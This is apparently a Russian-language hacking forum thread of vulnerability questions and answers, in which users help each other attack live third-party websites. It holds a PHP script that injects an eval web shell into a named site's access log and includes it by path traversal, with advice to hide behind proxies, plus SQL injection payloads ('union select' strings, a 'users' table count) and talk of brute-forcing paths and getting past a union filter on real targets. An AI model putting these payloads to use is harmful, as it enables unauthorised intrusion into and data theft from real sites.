Ваши вопросы по уязвимостям.

) Грины заманали прикалываться

1. Одновременная запись данных юзер-агента в лог и их инклуд не прокатят - последовательно только
2. Где ты увидел в логах данные user-agent-ов? Там только ip и get-ы урлов.
3. Соответственно сначала get с php-кодом в строке URL, затем (второй раз вызов фукнции) уже инклуд

PHP:

<?  
@set_time_limit(0);  
@ini_set("display_errors","1"); 
  function get($url)  
    {  
        $ch = curl_init();    
        curl_setopt($ch, CURLOPT_URL,$url);  
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
        curl_setopt($ch, CURLOPT_USERAGENT, 'Opera');  
        curl_setopt($ch, CURLOPT_REFERER, "http://www.KAKASHKA.ru"); 
        $ss=curl_exec($ch);  
        curl_close($ch);  
        return $ss;  
    }  


      $a=get('http://www.impan.pl/~ecmtb11/index.php?file=<?eval(stripslashes($_REQUEST[cmd]));?>');  
      $a=get('http://www.impan.pl/~ecmtb11/index.php?file=../../../../var/apache/logs/www.access_log&cmd=phpinfo();');
      echo $a; 
      #echo 'ok'; 
?> 


в общем чото в этом роде, логи там мегов на 25 по-моему, но сегодня туда уже ничего не пишется. Ну и про прокси не забывай, кхм

PS: А вообще там нет инклуда, там fopen, но схема предоженная выше работает когда есть инклуд. Тут просто читалка файлов. Так что читай, ищи превад

Шутку с тильдой оценил)

 

точно, fopen(), бля какже я не заметил. ппц совсем крыша съехала...


PS Большой респект за консультацию. многое уточнил

А тут по подробней плиз)

 

ну если вспомнить, что ты мне писал в личку, а говорили мы про тулзу, то чтобы брутить пути в ней, ссылку надо просто взять в одинарные кавычки )

 

Matnya, и у тебя хватало наглости с такими знаниями выебываться на автора лфи брутера?

 

http://labs.securitycompass.com/index.php/exploit-me/access-me/access-me-faq/

https://addons.mozilla.org/en-US/firefox/addon/7595

примерный перевод:

В общем всех пошлют

 

1. Открываешь сокет.
2. Пишешь в него запрос.
3. Закрываешь сокет.

 

как я понял нету разумного обьяснения во всем рунете!!!

 

Можно ли провести здесь скулю?

PHP:

$res=mysql_query("update peolpe set name='".$_POST["name"]."' where id='".$_POST["id"]."'");

Переменные name и id не фильтруются...

 

https://forum.antichat.ru/thread35207.html

 

PHP:

Microsoft OLE DB Provider for SQL Server error '80040e14'     
Incorrect syntax near the keyword 'order'.

PHP:

Microsoft OLE DB Provider for SQL Server error '80040e10'     
Procedure or function 'USP_GetMoreOverNewsByIDStory' expects parameter '@id_stories', which was not supplied. 

есть ли тут скул или просто ошибка, вроде на order by ругается и на все что после asp?id=1

 

спс за ответ но тут не access а mssql если не ошибаюсь.
Видимо тут просто ошибкабд и скулей врядли.
все равно спс

 

прошу помочь никак не могу удалит одинарную кавычку. Если убрат идет ошибка

 

1' union select 1,2,3 from table where '1'='1

 

помогло спс тока без кавычег 1=1
Теперь брутит до брутит наверное или можно сначала имя дб вывести?

 

Добрый вечер!
Подскажите пожалуйста, как сделать дамп базы данных MySQL имея логин и пароль от базы, а так же имя сайта.

Дело в том, что domain: SITE.RU и nserver: ns1.site.ru один и тот же. Я так понял, что у них теперь свой сервер? Раньше они хостились на masterhost.ru, там был путь: https://phpmyadmin.masterhost.ru и я делал дамп, но теперь пишет:

Что же делать? Как сделать дамп?

 

за4ем так полу4ается ??

не показовает//

 

Потому что таблички users не существует...

PS: Раздражают такие люди, которые любят "п0нт@нутьSя"...

 

Она существует но пустая

-1%20union%20select%201,2,3,count(*),5,6+from+users--

ЗЫ раньше он вообще на албани писал ((

 

спс я уже про тулзу с его выхода знаю и сам протестил))
Тут не MySql а какой то с нестандартыми ответами Access с Jet компонентом. Все таки не смог брути таблицы никакого, наверное префикс надо гадать.

 

как можно выполнить инъекцию если на union на сайте стоит фильтр ?